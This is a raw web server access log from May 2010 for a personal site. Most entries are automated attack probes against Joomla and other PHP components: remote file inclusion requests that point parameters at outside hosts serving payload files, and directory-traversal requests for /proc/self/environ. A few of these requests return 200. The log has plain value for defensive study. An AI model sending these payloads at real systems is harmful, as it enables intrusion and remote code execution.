84.2.107.110 - - [20/May/2010:08:03:35 -0500] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.2.107.110 - - [20/May/2010:08:03:35 -0500] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
84.2.107.110 - - [20/May/2010:08:03:35 -0500] "GET /logs/access_log.1271548800//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 367 "-""Mozilla/5.0"
208.43.122.86 - - [20/May/2010:08:03:43 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
208.43.122.86 - - [20/May/2010:08:03:44 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
208.43.122.86 - - [20/May/2010:08:03:44 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
212.80.237.122 - - [20/May/2010:08:06:20 -0500] "GET /logs/access_log.1230163200 HTTP/1.1" 404 310 "http://www.google.de/search?client=opera&rls=de&q=com_facileforms%26formid&sourceid=opera&ie=utf-8&oe=utf-8""Opera/9.80 (Windows NT 6.0; U; de) Presto/2.5.24 Version/10.53"
212.80.237.122 - - [20/May/2010:08:06:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/logs/access_log.1230163200""Opera/9.80 (Windows NT 6.0; U; de) Presto/2.5.24 Version/10.53"
87.250.255.243 - - [20/May/2010:08:06:42 -0500] "GET /logs/access_log.1187136000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.20.123 - - [20/May/2010:08:06:48 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
208.43.122.86 - - [20/May/2010:08:07:38 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
87.250.255.243 - - [20/May/2010:08:12:17 -0500] "GET /logs/access_log.1158105600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.9.198 - - [20/May/2010:08:13:06 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [20/May/2010:08:13:06 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [20/May/2010:08:13:20 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [20/May/2010:08:13:20 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [20/May/2010:08:13:22 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [20/May/2010:08:13:22 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.9.198 - - [20/May/2010:08:13:22 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.9.198 - - [20/May/2010:08:13:23 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
124.0.74.195 - - [20/May/2010:08:18:47 -0500] "GET //sources/lostpw.php?CONFIG[path]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 303 "-""Mozilla/5.0"
124.0.74.195 - - [20/May/2010:08:18:47 -0500] "GET /logs//sources/lostpw.php?CONFIG[path]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 308 "-""Mozilla/5.0"
124.0.74.195 - - [20/May/2010:08:18:47 -0500] "GET /logs/access_log.1262822400//sources/lostpw.php?CONFIG[path]=http://halupa.org.ua//plugins/sh/id1.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:08:19:30 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://christenplein.com/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:08:19:30 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://christenplein.com/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:08:19:30 -0500] "GET /logs/access_log.1262649600/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://christenplein.com/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:08:19:51 -0500] "GET /logs/access_log.1192147200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [20/May/2010:08:20:00 -0500] "GET /logs///skin/happycast_category_lightblack/setup.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:08:20:00 -0500] "GET ///skin/happycast_category_lightblack/setup.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:08:20:00 -0500] "GET /logs/access_log.1271548800///skin/happycast_category_lightblack/setup.php?dir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
213.92.118.159 - - [20/May/2010:08:20:14 -0500] "GET /logs/access_log.1264118400/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://christenplein.com/id1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
87.119.196.31 - - [20/May/2010:08:20:57 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.119.196.31 - - [20/May/2010:08:20:57 -0500] "GET /logs//index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.119.196.31 - - [20/May/2010:08:20:57 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.119.196.31 - - [20/May/2010:08:20:57 -0500] "GET //index.php?option=com_powermail&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
38.101.148.126 - - [20/May/2010:08:21:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [20/May/2010:08:21:41 -0500] "GET /logs/access_log.1244160000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
207.46.13.96 - - [20/May/2010:08:23:34 -0500] "GET /artwork/dressers.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.251.194.82 - - [20/May/2010:08:26:55 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.829"
208.43.122.86 - - [20/May/2010:08:27:02 -0500] "GET /logs/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
208.43.122.86 - - [20/May/2010:08:27:03 -0500] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
208.97.190.25 - - [20/May/2010:08:27:03 -0500] "GET /logs/access_log.1273017600//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
208.97.190.25 - - [20/May/2010:08:27:04 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
208.97.190.25 - - [20/May/2010:08:27:04 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
72.251.194.82 - - [20/May/2010:08:27:32 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:27:32 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.829"
174.132.224.66 - - [20/May/2010:08:27:36 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
87.252.3.230 - - [20/May/2010:08:27:47 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [20/May/2010:08:27:47 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
174.132.224.66 - - [20/May/2010:08:27:52 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:27:54 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
87.250.255.243 - - [20/May/2010:08:28:14 -0500] "GET /logs/access_log.1251331200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.251.194.82 - - [20/May/2010:08:28:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:28:36 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.829"
174.132.224.66 - - [20/May/2010:08:28:47 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:29:06 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
87.252.3.230 - - [20/May/2010:08:29:07 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.252.3.230 - - [20/May/2010:08:29:08 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
222.236.47.182 - - [20/May/2010:08:30:45 -0500] "GET /logs/access_log.1271548800/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:30:46 -0500] "GET /logs/access_log.1271548800/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:30:46 -0500] "GET /index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:30:47 -0500] "GET /logs/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:30:47 -0500] "GET /index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:30:47 -0500] "GET /logs/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:30:49 -0500] "GET /logs/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:30:49 -0500] "GET /index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:30:49 -0500] "GET /logs/access_log.1271548800/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.239.161.143 - - [20/May/2010:08:32:17 -0500] "GET //errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
211.239.161.143 - - [20/May/2010:08:32:18 -0500] "GET /logs//errors.php?error=http://plik.interfree.it/id.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
87.250.255.243 - - [20/May/2010:08:32:47 -0500] "GET /logs/access_log.1210204800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.112.114.164 - - [20/May/2010:08:33:22 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:08:33:23 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:08:33:23 -0500] "GET /logs/access_log.1271548800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:08:34:52 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:08:34:52 -0500] "GET /logs/access_log.1271548800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
208.112.114.164 - - [20/May/2010:08:34:53 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.boomong.com/bbs//data/idxx.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:34:56 -0500] "GET /logs/access_log.1270944000/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:35:03 -0500] "GET /logs/access_log.1270944000/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [20/May/2010:08:35:14 -0500] "GET /logs/access_log.1270944000/index.php?option=com_sefservicemap&Itemid=&mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.251.194.82 - - [20/May/2010:08:36:21 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:36:22 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:36:22 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:37:14 -0500] "GET /logs/access_log.1272844800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:37:14 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:37:14 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.829"
87.250.255.243 - - [20/May/2010:08:37:30 -0500] "GET /logs/access_log.1257724800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.251.194.82 - - [20/May/2010:08:38:01 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:38:01 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:38:01 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.829"
38.101.148.126 - - [20/May/2010:08:38:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [20/May/2010:08:38:39 -0500] "GET /logs/access_log.1231804800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
72.251.194.82 - - [20/May/2010:08:38:51 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:39:09 -0500] "GET /logs/access_log.1273363200//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:39:09 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:39:09 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6278 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:39:11 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:39:11 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:39:12 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.829"
174.132.224.66 - - [20/May/2010:08:39:31 -0500] "GET /logs/access_log.1273363200//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:39:32 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:39:32 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6278 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:39:32 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:39:33 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:39:33 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
208.115.111.248 - - [20/May/2010:08:39:35 -0500] "GET /logs/access_log.1223596800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:08:39:37 -0500] "GET /logs/access_log.1223683200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:08:39:39 -0500] "GET /logs/access_log.1224028800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:08:39:41 -0500] "GET /logs/access_log.1224979200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:08:39:44 -0500] "GET /logs/access_log.1225238400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:08:39:46 -0500] "GET /logs/access_log.1225411200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:08:39:48 -0500] "GET /logs/access_log.1225584000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
174.132.224.66 - - [20/May/2010:08:39:50 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:39:50 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:39:50 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
208.115.111.248 - - [20/May/2010:08:39:51 -0500] "GET /logs/access_log.1225670400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:08:39:53 -0500] "GET /logs/access_log.1225756800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:08:39:56 -0500] "GET /logs/access_log.1225843200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
174.132.224.66 - - [20/May/2010:08:40:01 -0500] "GET /logs/access_log.1272844800/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:40:01 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:40:02 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
72.251.194.82 - - [20/May/2010:08:40:05 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:40:11 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.829"
174.132.224.66 - - [20/May/2010:08:40:38 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:40:38 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.823"
174.132.224.66 - - [20/May/2010:08:40:38 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.823"
72.251.194.82 - - [20/May/2010:08:41:32 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.829"
72.251.194.82 - - [20/May/2010:08:41:36 -0500] "GET /logs/access_log.1273017600//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.829"
87.250.255.243 - - [20/May/2010:08:41:41 -0500] "GET /logs/access_log.1196121600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
203.251.80.167 - - [20/May/2010:08:41:57 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:08:41:57 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:08:41:57 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.132.224.66 - - [20/May/2010:08:42:20 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.823"
203.251.80.167 - - [20/May/2010:08:42:21 -0500] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:08:42:21 -0500] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
203.251.80.167 - - [20/May/2010:08:42:21 -0500] "GET /logs/access_log.1273363200%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
174.132.224.66 - - [20/May/2010:08:42:22 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
